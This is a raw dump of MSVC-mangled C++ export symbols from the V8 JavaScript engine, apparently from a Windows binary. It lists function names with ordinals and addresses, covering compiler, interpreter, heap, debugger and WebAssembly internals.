                                  ?GetOutLiveness@BytecodeLivenessMap@compiler@internal@v8@@QEBAPEBVBytecodeLivenessState@234@H@Z66050x140de0a40
                                  ?GetOutLivenessFor@BytecodeAnalysis@compiler@internal@v8@@QEBAPEBVBytecodeLivenessState@234@H@Z66060x140ea0510
                                  ?GetOuterContext@NodeProperties@compiler@internal@v8@@SAPEAVNode@234@PEAV5234@PEA_K@Z66070x140e44740
                                  ?GetOuterScopeWithContext@Scope@internal@v8@@QEAAPEAV123@XZ66080x140a55610
                                  ?GetOutputRegisterListOperand@BytecodeArrayBuilder@interpreter@internal@v8@@QEAAIVRegisterList@234@@Z66090x140894540
                                  ?GetOutputRegisterOperand@BytecodeArrayBuilder@interpreter@internal@v8@@QEAAIVRegister@234@@Z66100x140894580
                                  ?GetOutputStackFrameType@OptimizedCompilationInfo@internal@v8@@QEBA?AW4Type@StackFrame@23@XZ66110x1409dcc20
                                  ?GetOwnConstantElement@ObjectRef@compiler@internal@v8@@QEBA?AV?$Optional@VObjectRef@compiler@internal@v8@@@base@4@IW4SerializationPolicy@234@@Z66120x140de1060
                                  ?GetOwnPropertyDescriptor@JSReceiver@internal@v8@@SA?AV?$Maybe@_N@3@PEAVIsolate@23@V?$Handle@VJSReceiver@internal@v8@@@23@V?$Handle@VObject@internal@v8@@@23@PEAVPropertyDescriptor@23@@Z66130x1407b89b0
                                  ?GetOwnPropertyDescriptor@Object@v8@@QEAA?AV?$MaybeLocal@VValue@v8@@@2@V?$Local@VContext@v8@@@2@V?$Local@VName@v8@@@2@@Z66140x140a8a650
                                  ?GetOwnPropertyNames@Object@v8@@QEAA?AV?$MaybeLocal@VArray@v8@@@2@V?$Local@VContext@v8@@@2@@Z66150x140a8aa90
                                  ?GetOwnPropertyNames@Object@v8@@QEAA?AV?$MaybeLocal@VArray@v8@@@2@V?$Local@VContext@v8@@@2@W4PropertyFilter@2@W4KeyConversionMode@2@@Z66160x140a8aad0
                                  ?GetPCOffset@CodeCommentsIterator@internal@v8@@QEBAIXZ66170x1409fa0e0
                                  ?GetPageForSize@FreeListFastAlloc@internal@v8@@UEAAPEAVPage@23@_K@Z66180x14041b010
                                  ?GetPageForSize@FreeListLegacy@internal@v8@@UEAAPEAVPage@23@_K@Z66190x14041b090
                                  ?GetPageForSize@FreeListMany@internal@v8@@UEAAPEAVPage@23@_K@Z66200x1408d3390
                                  ?GetPageForSize@FreeListMap@internal@v8@@UEAAPEAVPage@23@_K@Z66210x1408d3400
                                  ?GetParallelMove@Instruction@compiler@internal@v8@@QEAAPEAVParallelMove@234@W4GapPosition@1234@@Z66220x140453b00
                                  ?GetParallelMove@Instruction@compiler@internal@v8@@QEBAPEBVParallelMove@234@W4GapPosition@1234@@Z66230x140453b00
                                  ?GetParameterCount@CallInterfaceDescriptor@internal@v8@@QEBAHXZ66240x14045b0d0
                                  ?GetParameterCount@InterpretedFrame@wasm@internal@v8@@QEBAHXZ66250x1405572f0
                                  ?GetParameterCountAfterLowering@Int64Lowering@compiler@internal@v8@@SAHPEAV?$Signature@W4MachineRepresentation@internal@v8@@@34@@Z66260x140ed2fa0
                                  ?GetParameterLocation@Linkage@compiler@internal@v8@@QEBA?AVLinkageLocation@234@H@Z66270x14045b0e0
                                  ?GetParameterSecondaryLocation@Linkage@compiler@internal@v8@@QEBA?AVLinkageLocation@234@H@Z66280x140e67e20
                                  ?GetParameterType@CallDescriptor@compiler@internal@v8@@QEBA?AVMachineType@34@_K@Z66290x14045b120
                                  ?GetParameterType@CallInterfaceDescriptor@internal@v8@@QEBA?AVMachineType@23@H@Z66300x14045b140
                                  ?GetParameterType@Linkage@compiler@internal@v8@@QEBA?AVMachineType@34@H@Z66310x14045b160
                                  ?GetParent@CpuProfileNode@v8@@QEBAPEBV12@XZ66320x14029f0f0
                                  ?GetPatch@Version@internal@v8@@SAHXZ66330x14051a6d0
                                  ?GetPlacement@Scheduler@compiler@internal@v8@@AEAA?AW4Placement@1234@PEAVNode@234@@Z66340x140fb8a30
                                  ?GetPlatformPageAllocator@internal@v8@@YAPEAVPageAllocator@2@XZ66350x1405f41a0
                                  ?GetPoisoningMitigationLevel@OptimizedCompilationInfo@internal@v8@@QEBA?AW4PoisoningMitigationLevel@23@XZ66360x140076a10
                                  ?GetPosition@WasmFunctionBuilder@wasm@internal@v8@@QEBA_KXZ66370x14052faf0
                                  ?GetPositionInfo@Script@internal@v8@@QEBA_NHPEAUPositionInfo@123@W4OffsetFlag@123@@Z66380x140777b50
                                  ?GetPossibleBreakpoints@Debug@internal@v8@@QEAA_NV?$Handle@VScript@internal@v8@@@23@HH_NPEAV?$vector@VBreakLocation@internal@v8@@V?$allocator@VBreakLocation@internal@v8@@@std@@@std@@@Z66390x1409c0d30
                                  ?GetPossibleBreakpoints@Script@debug@v8@@QEBA_NAEBVLocation@23@0_NPEAV?$vector@VBreakLocation@debug@v8@@V?$allocator@VBreakLocation@debug@v8@@@std@@@std@@@Z66400x140a8ab00
                                  ?GetPossibleBreakpoints@WasmScript@internal@v8@@SA_NPEAVNativeModule@wasm@23@AEBVLocation@debug@3@1PEAV?$vector@VBreakLocation@debug@v8@@V?$allocator@VBreakLocation@debug@v8@@@std@@@std@@@Z66410x140567620
                                  ?GetPreviousCodeStartAddress@CodeEvent@v8@@QEAA_KXZ66420x140076e20
                                  ?GetPrivate@Object@v8@@QEAA?AV?$MaybeLocal@VValue@v8@@@2@V?$Local@VContext@v8@@@2@V?$Local@VPrivate@v8@@@2@@Z66430x140a8af30
                                  ?GetPrivateMembers@debug@v8@@YA_NV?$Local@VContext@v8@@@2@V?$Local@VObject@v8@@@2@PEAV?$vector@V?$Local@VValue@v8@@@v8@@V?$allocator@V?$Local@VValue@v8@@@v8@@@std@@@std@@2@Z66440x140a8af50
                                  ?GetProcedureAddressOffset@EhFrameWriter@internal@v8@@AEBAHXZ66450x140448460
                                  ?GetProcedureSizeOffset@EhFrameWriter@internal@v8@@AEBAHXZ66460x140448470
                                  ?GetProfile@CpuProfiler@internal@v8@@QEAAPEAVCpuProfile@23@H@Z66470x1406e7c30
                                  ?GetProfilesCount@CpuProfiler@internal@v8@@QEAAHXZ66480x1406e7d30
                                  ?GetPromise@Resolver@Promise@v8@@QEAA?AV?$Local@VPromise@v8@@@3@XZ66490x140477820
                                  ?GetPromise@WasmModuleObjectBuilderStreaming@v8@@QEAA?AV?$Local@VPromise@v8@@@2@XZ66500x140076d00
                                  ?GetPromiseOnStackOnThrow@Isolate@internal@v8@@QEAA?AV?$Handle@VObject@internal@v8@@@23@XZ66510x14097e420
                                  ?GetProperty@Object@internal@v8@@SA?AV?$MaybeHandle@VObject@internal@v8@@@23@PEAVLookupIterator@23@_N@Z66520x140778120
                                  ?GetPropertyAccessInfo@JSHeapBroker@compiler@internal@v8@@QEAA?AVPropertyAccessInfo@234@VMapRef@234@VNameRef@234@W4AccessMode@234@PEAVCompilationDependencies@234@W4SerializationPolicy@234@@Z66530x140de2420
                                  ?GetPropertyAttributes@Object@v8@@QEAA?AV?$Maybe@W4PropertyAttribute@v8@@@2@V?$Local@VContext@v8@@@2@V?$Local@VValue@v8@@@2@@Z66540x140a8b790
                                  ?GetPropertyCell@LookupIterator@internal@v8@@QEBA?AV?$Handle@VPropertyCell@internal@v8@@@23@XZ66550x14079cbc0
                                  ?GetPropertyDetails@MapRef@compiler@internal@v8@@QEBA?AVPropertyDetails@34@VInternalIndex@34@@Z66560x140de30d0
                                  ?GetPropertyKey@MapRef@compiler@internal@v8@@QEBA?AVNameRef@234@VInternalIndex@34@@Z66570x140de31e0
                                  ?GetPropertyNames@Object@v8@@QEAA?AV?$MaybeLocal@VArray@v8@@@2@V?$Local@VContext@v8@@@2@@Z66580x140a8bac0
                                  ?GetPropertyNames@Object@v8@@QEAA?AV?$MaybeLocal@VArray@v8@@@2@V?$Local@VContext@v8@@@2@W4KeyCollectionMode@2@W4PropertyFilter@2@W4IndexFilter@2@W4KeyConversionMode@2@@Z66590x140a8bb00
                                  ?GetPropertySequence@RegExpParser@internal@v8@@QEAAPEAVRegExpTree@23@AEBV?$ZoneVector@D@23@@Z66600x1406aa480
                                  ?GetProtectedInstructionsData@CodeGenerator@compiler@internal@v8@@QEAA?AV?$OwnedVector@E@34@XZ66610x140e4af40
                                  ?GetPrototype@Object@v8@@QEAA?AV?$Local@VValue@v8@@@2@XZ66620x140a8bf80
                                  ?GetPrototypeTransition@TransitionsAccessor@internal@v8@@QEAA?AV?$Handle@VMap@internal@v8@@@23@V?$Handle@VObject@internal@v8@@@23@@Z66630x140743580
                                  ?GetPrototypeTransitions@TransitionsAccessor@internal@v8@@AEAA?AVWeakFixedArray@23@XZ66640x140743690
                                  ?GetPushCompatibleMoves@CodeGenerator@compiler@internal@v8@@CAXPEAVInstruction@234@V?$Flags@W4PushTypeFlag@CodeGenerator@compiler@internal@v8@@H@base@4@PEAV?$ZoneVector@PEAVMoveOperands@compiler@internal@v8@@@34@@Z66650x140e4afd0
                                  ?GetRandomMmapAddr@BoundedPageAllocator@base@v8@@UEAAPEAXXZ66660x140dca140
                                  ?GetRandomMmapAddr@OS@base@v8@@CAPEAXXZ66670x140dc0a60
                                  ?GetRandomMmapAddr@PageAllocator@base@v8@@UEAAPEAXXZ66680x140dc8b60
                                  ?GetRandomMmapAddr@internal@v8@@YAPEAXXZ66690x1405f41c0
                                  ?GetRange@Type@compiler@internal@v8@@QEBA?AV1234@XZ66700x140e2eff0
                                  ?GetRangeData@HandlerTable@internal@v8@@QEBAHH@Z66710x1409e8530
                                  ?GetRangeEnd@HandlerTable@internal@v8@@QEBAHH@Z66720x1409e8550
                                  ?GetRangeHandler@HandlerTable@internal@v8@@QEBAHH@Z66730x1409e8570
                                  ?GetRangePrediction@HandlerTable@internal@v8@@AEBA?AW4CatchPrediction@123@H@Z66740x1409e8590
                                  ?GetRangeStart@HandlerTable@internal@v8@@QEBAHH@Z66750x1409e85b0
                                  ?GetRareData@ClassScope@internal@v8@@AEAAPEAURareData@123@XZ66760x140641d90
                                  ?GetRareVariable@DeclarationScope@internal@v8@@AEBAPEAVVariable@23@W4RareVariable@123@@Z66770x140641da0
                                  ?GetRawNameFromIdentifier@Parser@internal@v8@@AEAAPEBVAstRawString@23@PEBV423@@Z66780x140076870
                                  ?GetReadOnlyRoots@ReadOnlyHeap@internal@v8@@SA?AVReadOnlyRoots@23@VHeapObject@23@@Z66790x140423680
                                  ?GetRealNamedProperty@Object@v8@@QEAA?AV?$MaybeLocal@VValue@v8@@@2@V?$Local@VContext@v8@@@2@V?$Local@VName@v8@@@2@@Z66800x140a8c040
                                  ?GetRealNamedPropertyAttributes@Object@v8@@QEAA?AV?$Maybe@W4PropertyAttribute@v8@@@2@V?$Local@VContext@v8@@@2@V?$Local@VName@v8@@@2@@Z66810x140a8c490
                                  ?GetRealNamedPropertyAttributesInPrototypeChain@Object@v8@@QEAA?AV?$Maybe@W4PropertyAttribute@v8@@@2@V?$Local@VContext@v8@@@2@V?$Local@VName@v8@@@2@@Z66820x140a8c770
                                  ?GetRealNamedPropertyInPrototypeChain@Object@v8@@QEAA?AV?$MaybeLocal@VValue@v8@@@2@V?$Local@VContext@v8@@@2@V?$Local@VName@v8@@@2@@Z66830x140a8cab0
                                  ?GetReceiver@LookupIterator@internal@v8@@QEBA?AV?$Handle@VObject@internal@v8@@@23@XZ66840x1404236a0
                                  ?GetReceiverMap@LookupIterator@internal@v8@@AEBA?AV?$Handle@VMap@internal@v8@@@23@XZ66850x14079cc50
                                  ?GetReceiverMode@Bytecodes@interpreter@internal@v8@@SA?AW4ConvertReceiverMode@34@W4Bytecode@234@@Z66860x1404236b0
                                  ?GetReceiverScope@?$ParserBase@VParser@internal@v8@@@internal@v8@@IEBAPEAVDeclarationScope@23@XZ66870x1406fb1e0
                                  ?GetReceiverScope@Scope@internal@v8@@QEAAPEAVDeclarationScope@23@XZ66880x140a55630
                                  ?GetRegisterCountOperand@BytecodeArrayAccessor@interpreter@internal@v8@@QEBAIH@Z66890x14089ae00
                                  ?GetRegisterInfo@BytecodeRegisterOptimizer@interpreter@internal@v8@@AEAAPEAVRegisterInfo@1234@VRegister@234@@Z66900x140871360
                                  ?GetRegisterInfoTableIndex@BytecodeRegisterOptimizer@interpreter@internal@v8@@AEBA_KVRegister@234@@Z66910x140871380
                                  ?GetRegisterOperand@BytecodeArrayAccessor@interpreter@internal@v8@@QEBA?AVRegister@234@H@Z66920x14089ae10
                                  ?GetRegisterOperandRange@BytecodeArrayAccessor@interpreter@internal@v8@@QEBAHH@Z66930x14089aed0
                                  ?GetRegisterParameter@CallInterfaceDescriptor@internal@v8@@QEBA?AVRegister@23@H@Z66940x14045b1a0
                                  ?GetRegisterParameterCount@CallInterfaceDescriptor@internal@v8@@QEBAHXZ66950x14045b1c0
                                  ?GetRename@InstructionSelector@compiler@internal@v8@@AEAAHH@Z66960x140e37170
                                  ?GetReplace@Symbol@v8@@SA?AV?$Local@VSymbol@v8@@@2@PEAVIsolate@2@@Z66970x140a8d040
                                  ?GetReplacementHigh@Int64Lowering@compiler@internal@v8@@AEAAPEAVNode@234@PEAV5234@@Z66980x140ed2fe0
                                  ?GetReplacementLow@Int64Lowering@compiler@internal@v8@@AEAAPEAVNode@234@PEAV5234@@Z66990x140ed3000
                                  ?GetRepresentation@InstructionSequence@compiler@internal@v8@@QEBA?AW4MachineRepresentation@34@H@Z67000x140e049d0
                                  ?GetRepresentationFor@RepresentationChanger@compiler@internal@v8@@QEAAPEAVNode@234@PEAV5234@W4MachineRepresentation@34@VType@234@0VUseInfo@234@@Z67010x140ffefb0
                                  ?GetResourceName@ScriptOrModule@v8@@QEAA?AV?$Local@VValue@v8@@@2@XZ67020x140a8d050
                                  ?GetReturnCount@CallInterfaceDescriptor@internal@v8@@QEBAHXZ67030x14045b1d0
                                  ?GetReturnHandler@HandlerTable@internal@v8@@AEBAHH@Z67040x1409e85d0
                                  ?GetReturnLocation@CallDescriptor@compiler@internal@v8@@QEBA?AVLinkageLocation@234@_K@Z67050x14045b1e0
                                  ?GetReturnLocation@Linkage@compiler@internal@v8@@QEBA?AVLinkageLocation@234@_K@Z67060x14045b200
                                  ?GetReturnOffset@HandlerTable@internal@v8@@AEBAHH@Z67070x1409e85f0
                                  ?GetReturnSlotCount@Frame@compiler@internal@v8@@QEBAHXZ67080x1402fef50
                                  ?GetReturnType@CallDescriptor@compiler@internal@v8@@QEBA?AVMachineType@34@_K@Z67090x14045b220
                                  ?GetReturnType@CallInterfaceDescriptor@internal@v8@@QEBA?AVMachineType@23@H@Z67100x14045b240
                                  ?GetReturnType@Linkage@compiler@internal@v8@@QEBA?AVMachineType@34@_K@Z67110x14045b260
                                  ?GetReturnValue@Thread@WasmInterpreter@wasm@internal@v8@@QEAA?AVWasmValue@345@H@Z67120x140557310
                                  ?GetRoot@HeapSnapshot@v8@@QEBAPEBVHeapGraphNode@2@XZ67130x140076c50
                                  ?GetRoot@LookupIterator@internal@v8@@CA?AV?$Handle@VJSReceiver@internal@v8@@@23@PEAVIsolate@23@V?$Handle@VObject@internal@v8@@@23@_K@Z67140x140423740
                                  ?GetRootForNonJSReceiver@LookupIterator@internal@v8@@CA?AV?$Handle@VJSReceiver@internal@v8@@@23@PEAVIsolate@23@V?$Handle@VObject@internal@v8@@@23@_K@Z67150x14079cd20
                                  ?GetRootHandle@JSHeapBroker@compiler@internal@v8@@QEAA?AV?$Handle@VObject@internal@v8@@@34@VObject@34@@Z67160x140de33e0
                                  ?GetRuntimeCallDescriptor@Linkage@compiler@internal@v8@@SAPEAVCallDescriptor@234@PEAVZone@34@W4FunctionId@Runtime@34@HV?$Flags@W4Property@Operator@compiler@internal@v8@@E@base@4@V?$Flags@W4Flag@CallDescriptor@compiler@internal@v8@@H@base@4@@Z67170x140e67ee0
                                  ?GetRuntimeIdOperand@BytecodeArrayAccessor@interpreter@internal@v8@@QEBA?AW4FunctionId@Runtime@34@H@Z67180x14089ab70
                                  ?GetRuntimeStubId@NativeModule@wasm@internal@v8@@QEBA?AW4RuntimeStubId@WasmCode@234@_K@Z67190x140571480
                                  ?GetSFIFromEntry@OSROptimizedCodeCache@internal@v8@@AEAA?AVSharedFunctionInfo@23@H@Z67200x14075be80
                                  ?GetSONAME@Version@internal@v8@@SAXV?$Vector@D@23@@Z67210x1405f18e0
                                  ?GetSafepointTableOffset@CodeGenerator@compiler@internal@v8@@QEBA_KXZ67220x140495740
                                  ?GetSample@CpuProfile@v8@@QEBAPEBVCpuProfileNode@2@H@Z67230x140a8d0f0
                                  ?GetSampleTimestamp@CpuProfile@v8@@QEBA_JH@Z67240x140a8d110
                                  ?GetSamplesCount@CpuProfile@v8@@QEBAHXZ67250x1402fecd0
                                  ?GetScript@ScriptData@Coverage@debug@v8@@QEBA?AV?$Local@VScript@debug@v8@@@4@XZ67260x14095ccc0
                                  ?GetScript@ScriptData@TypeProfile@debug@v8@@QEBA?AV?$Local@VScript@debug@v8@@@4@XZ67270x14095ccc0
                                  ?GetScriptColumn@CodeEvent@v8@@QEAAHXZ67280x1402f17b0
                                  ?GetScriptColumnNumber@Function@v8@@QEBAHXZ67290x140a8d150
                                  ?GetScriptData@Coverage@debug@v8@@QEBA?AVScriptData@123@_K@Z67300x140a8d260
                                  ?GetScriptData@TypeProfile@debug@v8@@QEBA?AVScriptData@123@_K@Z67310x140a8d260
                                  ?GetScriptId@CpuProfileNode@v8@@QEBAHXZ67320x140a8d390
                                  ?GetScriptId@StackFrame@v8@@QEBAHXZ67330x140a8d3a0
                                  ?GetScriptLine@CodeEvent@v8@@QEAAHXZ67340x14036ea40
                                  ?GetScriptLineNumber@Function@v8@@QEBAHXZ67350x140a8d3b0
                                  ?GetScriptName@CodeEvent@v8@@QEAA?AV?$Local@VString@v8@@@2@XZ67360x1404286e0
                                  ?GetScriptName@StackFrame@v8@@QEBA?AV?$Local@VString@v8@@@2@XZ67370x140a8d4c0
                                  ?GetScriptName@UnboundScript@v8@@QEAA?AV?$Local@VValue@v8@@@2@XZ67380x140a8d6c0
                                  ?GetScriptNameOrSourceURL@StackFrame@v8@@QEBA?AV?$Local@VString@v8@@@2@XZ67390x140a8d810
                                  ?GetScriptOrigin@Function@v8@@QEBA?AVScriptOrigin@2@XZ67400x140a8da10
                                  ?GetScriptOrigin@Message@v8@@QEBA?AVScriptOrigin@2@XZ67410x140a8db40
                                  ?GetScriptResourceName@CpuProfileNode@v8@@QEBA?AV?$Local@VString@v8@@@2@XZ67420x140a8dfc0
                                  ?GetScriptResourceName@Message@v8@@QEBA?AV?$Local@VValue@v8@@@2@XZ67430x140a8e020
                                  ?GetScriptResourceNameStr@CpuProfileNode@v8@@QEBAPEBDXZ67440x140a8e050
                                  ?GetScriptScope@Scope@internal@v8@@QEAAPEAVDeclarationScope@23@XZ67450x140a55660
                                  ?GetSearch@Symbol@v8@@SA?AV?$Local@VSymbol@v8@@@2@PEAVIsolate@2@@Z67460x140a8e060
                                  ?GetSecurityToken@Context@v8@@QEAA?AV?$Local@VValue@v8@@@2@XZ67470x140a8e070
                                  ?GetSerializedNativeModuleSize@WasmSerializer@wasm@internal@v8@@QEBA_KXZ67480x14051a6e0
                                  ?GetShallowSize@HeapGraphNode@v8@@QEBA_KXZ67490x140076c50
                                  ?GetSharedArrayBufferFromId@Delegate@ValueDeserializer@v8@@UEAA?AV?$MaybeLocal@VSharedArrayBuffer@v8@@@3@PEAVIsolate@3@I@Z67500x140a8e1f0
                                  ?GetSharedArrayBufferId@Delegate@ValueSerializer@v8@@UEAA?AV?$Maybe@I@3@PEAVIsolate@3@V?$Local@VSharedArrayBuffer@v8@@@3@@Z67510x140a8e2b0
                                  ?GetSharedFunctionInfoForScript@Compiler@internal@v8@@SA?AV?$MaybeHandle@VSharedFunctionInfo@internal@v8@@@23@PEAVIsolate@23@V?$Handle@VString@internal@v8@@@23@AEBUScriptDetails@123@VScriptOriginOptions@3@PEAVExtension@3@PEAVScriptData@23@W4CompileOptions@ScriptCompiler@3@W4NoCacheReason@ScriptCompiler@3@W4NativesFlag@23@@Z67520x1409f2e20
                                  ?GetSharedFunctionInfoForStreamedScript@Compiler@internal@v8@@SA?AV?$MaybeHandle@VSharedFunctionInfo@internal@v8@@@23@PEAVIsolate@23@V?$Handle@VString@internal@v8@@@23@AEBUScriptDetails@123@VScriptOriginOptions@3@PEAUScriptStreamingData@23@@Z67530x1409f34d0
                                  ?GetSharedLibraryAddresses@OS@base@v8@@SA?AV?$vector@USharedLibraryAddress@OS@base@v8@@V?$allocator@USharedLibraryAddress@OS@base@v8@@@std@@@std@@XZ67540x140dc0b10
                                  ?GetSharedMemoryStatistics@V8@v8@@SAXPEAVSharedMemoryStatistics@2@@Z67550x140a8e380
                                  ?GetSignature@WasmModuleBuilder@wasm@internal@v8@@QEAAPEAV?$Signature@VValueType@wasm@internal@v8@@@34@I@Z67560x14052fb00
                                  ?GetSignedOperand@BytecodeArrayAccessor@interpreter@internal@v8@@AEBAHHW4OperandType@234@@Z67570x14089af40
                                  ?GetSimpleTargetDetails@TransitionsAccessor@internal@v8@@AEAA?AVPropertyDetails@23@VMap@23@@Z67580x140423a30
                                  ?GetSimpleTransition@TransitionsAccessor@internal@v8@@AEAA?AVMap@23@XZ67590x1407436d0
                                  ?GetSimpleTransitionKey@TransitionsAccessor@internal@v8@@CA?AVName@23@VMap@23@@Z67600x140423a60
                                  ?GetSimplifiedCDescriptor@Linkage@compiler@internal@v8@@SAPEAVCallDescriptor@234@PEAVZone@34@PEBV?$Signature@VMachineType@internal@v8@@@34@V?$Flags@W4Flag@CallDescriptor@compiler@internal@v8@@H@base@4@@Z67610x140ec2040
                                  ?GetSingle@FrameSummary@internal@v8@@SA?AV123@PEBVStandardFrame@23@@Z67620x14098a020
                                  ?GetSlotAboveSPBeforeTailCall@CodeGenerator@compiler@internal@v8@@AEAA_NPEAVInstruction@234@PEAH@Z67630x140e4b1a0
                                  ?GetSlotOperand@BytecodeArrayAccessor@interpreter@internal@v8@@QEBA?AVFeedbackSlot@34@H@Z67640x14089afc0
                                  ?GetSlowModeBackingStoreLength@LayoutDescriptor@internal@v8@@CAHH@Z67650x140423a90
                                  ?GetSmiConstant@TurboAssembler@internal@v8@@IEAA?AVRegister@23@VSmi@23@@Z67660x14049a890
                                  ?GetSnapshotCount@HeapProfiler@v8@@QEAAHXZ67670x140a8e390
                                  ?GetSource@RegExp@v8@@QEBA?AV?$Local@VString@v8@@@2@XZ67680x140a8e3a0
                                  ?GetSourceBreakLocations@Debug@internal@v8@@SA?AV?$Handle@VObject@internal@v8@@@23@PEAVIsolate@23@V?$Handle@VSharedFunctionInfo@internal@v8@@@23@@Z67690x1409c1400
                                  ?GetSourceLine@Message@v8@@QEBA?AV?$MaybeLocal@VString@v8@@@2@V?$Local@VContext@v8@@@2@@Z67700x140a8e420
                                  ?GetSourceLine@WasmModuleSourceMap@wasm@internal@v8@@QEBA_K_K@Z67710x14052aa70
                                  ?GetSourceLineNumber@SourcePositionTable@internal@v8@@QEBAHH@Z67720x1406d6090
                                  ?GetSourceLocation@Script@debug@v8@@QEBA?AVLocation@23@H@Z67730x140a8e630
                                  ?GetSourceMappingURL@UnboundScript@v8@@QEAA?AV?$Local@VValue@v8@@@2@XZ67740x140a8e680
                                  ?GetSourceOffset@Script@debug@v8@@QEBAHAEBVLocation@23@@Z67750x140a8e7d0
                                  ?GetSourcePosition@AsmJsOffsetInformation@wasm@internal@v8@@QEAAHHH_N@Z67760x140528f90
                                  ?GetSourcePosition@InstructionSequence@compiler@internal@v8@@QEBA_NPEBVInstruction@234@PEAVSourcePosition@34@@Z67770x140e04a30
                                  ?GetSourcePosition@SourcePositionTable@compiler@internal@v8@@QEBA?AVSourcePosition@34@PEAVNode@234@@Z67780x140ea53d0
                                  ?GetSourcePositionBefore@WasmCode@wasm@internal@v8@@QEAAHH@Z67790x1405717b0
                                  ?GetSourcePositionTable@CodeGenerator@compiler@internal@v8@@QEAA?AV?$OwnedVector@E@34@XZ67800x140e4b1f0
                                  ?GetSourcePositions@FeedbackNexus@internal@v8@@QEBA?AV?$vector@HV?$allocator@H@std@@@std@@XZ67810x1407f86b0
                                  ?GetSourceType@CpuProfileNode@v8@@QEBA?AW4SourceType@12@XZ67820x140a8e980
                                  ?GetSourceURL@UnboundScript@v8@@QEAA?AV?$Local@VValue@v8@@@2@XZ67830x140a8e990
                                  ?GetSpaceName@Heap@internal@v8@@SAPEBDW4AllocationSpace@23@@Z67840x1409321d0
                                  ?GetSpeculationMode@FeedbackNexus@internal@v8@@QEAA?AW4SpeculationMode@23@XZ67850x1407f8970
                                  ?GetSpillMoveInsertionLocations@TopLevelLiveRange@compiler@internal@v8@@QEBAPEAUSpillMoveInsertionList@1234@PEBVRegisterAllocationData@234@@Z67860x14029f0f0
                                  ?GetSpillOperand@TopLevelLiveRange@compiler@internal@v8@@QEBAPEAVInstructionOperand@234@XZ67870x14029f090
                                  ?GetSpillRange@TopLevelLiveRange@compiler@internal@v8@@QEBAPEAVSpillRange@234@XZ67880x14029f090
                                  ?GetSpillRangeOperand@TopLevelLiveRange@compiler@internal@v8@@QEBA?AVAllocatedOperand@234@XZ67890x140ef78e0
                                  ?GetSpillSlotCount@Frame@compiler@internal@v8@@QEBAHXZ67900x140076b10
                                  ?GetSplit@Symbol@v8@@SA?AV?$Local@VSymbol@v8@@@2@PEAVIsolate@2@@Z67910x140a8eae0
                                  ?GetStackCheckOffset@CodeGenerator@compiler@internal@v8@@QEAAIXZ67920x140e4b210
                                  ?GetStackDepth@DebugInfo@wasm@internal@v8@@QEAAHPEAVIsolate@34@_K@Z67930x140567970
                                  ?GetStackHeight@InterpretedFrame@wasm@internal@v8@@QEBAHXZ67940x140557430
                                  ?GetStackParameterCount@CallInterfaceDescriptor@internal@v8@@QEBAHXZ67950x14045b280
                                  ?GetStackParameterDelta@CallDescriptor@compiler@internal@v8@@QEBAHPEBV1234@@Z67960x140e67f60
                                  ?GetStackSample@Isolate@v8@@QEAAXAEBURegisterState@2@PEAPEAX_KPEAUSampleInfo@2@@Z67970x140a8eaf0
                                  ?GetStackSample@TickSample@internal@v8@@SA_NPEAVIsolate@23@PEAURegisterState@3@W4RecordCEntryFrame@123@PEAPEAX_KPEAUSampleInfo@3@_N3@Z67980x1406cce20
                                  ?GetStackScopeObject@DebugInfo@wasm@internal@v8@@QEAA?AV?$Handle@VJSObject@internal@v8@@@34@PEAVIsolate@34@_K11@Z67990x1405679e0
                                  ?GetStackSlot@Stack@base@v8@@SAPEAXPEAX@Z68000x1400769f0
                                  ?GetStackStart@Stack@base@v8@@SAPEAXXZ68010x140dc0d60
                                  ?GetStackTrace@Exception@v8@@SA?AV?$Local@VStackTrace@v8@@@2@V?$Local@VValue@v8@@@2@@Z68020x140a8eb60
                                  ?GetStackTrace@Message@v8@@QEBA?AV?$Local@VStackTrace@v8@@@2@XZ68030x140a8ebf0
                                  ?GetStackValue@DebugInfo@wasm@internal@v8@@QEAA?AVWasmValue@234@HPEAVIsolate@34@_K11@Z68040x140567b80
                                  ?GetStackValue@InterpretedFrame@wasm@internal@v8@@QEBA?AVWasmValue@234@H@Z68050x1405574d0
                                  ?GetStartColumn@Message@v8@@QEBA?AV?$Maybe@H@2@V?$Local@VContext@v8@@@2@@Z68060x140a8ee50
                                  ?GetStartColumn@Message@v8@@QEBAHXZ68070x140a8ee70
                                  ?GetStartPosition@Message@v8@@QEBAHXZ68080x140a8efe0
                                  ?GetStartTime@CpuProfile@v8@@QEBA_JXZ68090x140a8f150
                                  ?GetState@SourcePositionTableIterator@internal@v8@@QEBA?AUIndexAndPositionState@123@XZ68100x140423aa0
                                  ?GetStatus@Module@v8@@QEBA?AW4Status@12@XZ68110x140a8f170
                                  ?GetStoreICSlot@FeedbackVectorSpec@internal@v8@@QEAA?AW4FeedbackSlotKind@23@W4LanguageMode@23@@Z68120x140423ad0
                                  ?GetStreamingCompilationOwnership@WasmEngine@wasm@internal@v8@@QEAA_N_K@Z68130x14055fb10
                                  ?GetString@Version@internal@v8@@SAXV?$Vector@D@23@@Z68140x1405f19b0
                                  ?GetStringCountForTesting@StringsStorage@internal@v8@@QEBA_KXZ68150x1402fef50
                                  ?GetStringOption@Intl@internal@v8@@SA?AV?$Maybe@_N@3@PEAVIsolate@23@V?$Handle@VJSReceiver@internal@v8@@@23@PEBDV?$vector@PEBDV?$allocator@PEBD@std@@@std@@2PEAV?$unique_ptr@$$BY0A@DU?$default_delete@$$BY0A@D@std@@@8@@Z68160x1407ee220
                                  ?GetStrongGcSubrootName@V8HeapExplorer@internal@v8@@AEAAPEBDVObject@23@@Z68170x1406deaf0
                                  ?GetStrongValue@MapRef@compiler@internal@v8@@QEBA?AV?$Optional@VObjectRef@compiler@internal@v8@@@base@4@VInternalIndex@34@@Z68180x140de3650
                                  ?GetStubCallContextParamIndex@Linkage@compiler@internal@v8@@SAHH@Z68190x1402a33a0
                                  ?GetStubCallDescriptor@Linkage@compiler@internal@v8@@SAPEAVCallDescriptor@234@PEAVZone@34@AEBVCallInterfaceDescriptor@34@HV?$Flags@W4Flag@CallDescriptor@compiler@internal@v8@@H@base@4@V?$Flags@W4Property@Operator@compiler@internal@v8@@E@94@W4StubCallMode@34@@Z68200x140e67fc0
                                  ?GetSuperConstructor@BytecodeArrayBuilder@interpreter@internal@v8@@QEAAAEAV1234@VRegister@234@@Z68210x1408945b0
                                  ?GetSuperConstructor@JSOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ68220x140eae030
                                  ?GetSymbol@Parser@internal@v8@@AEBAPEBVAstRawString@23@XZ68230x1406fae80
                                  ?GetSystemEntryName@V8HeapExplorer@internal@v8@@AEAAPEBDVHeapObject@23@@Z68240x1406decb0
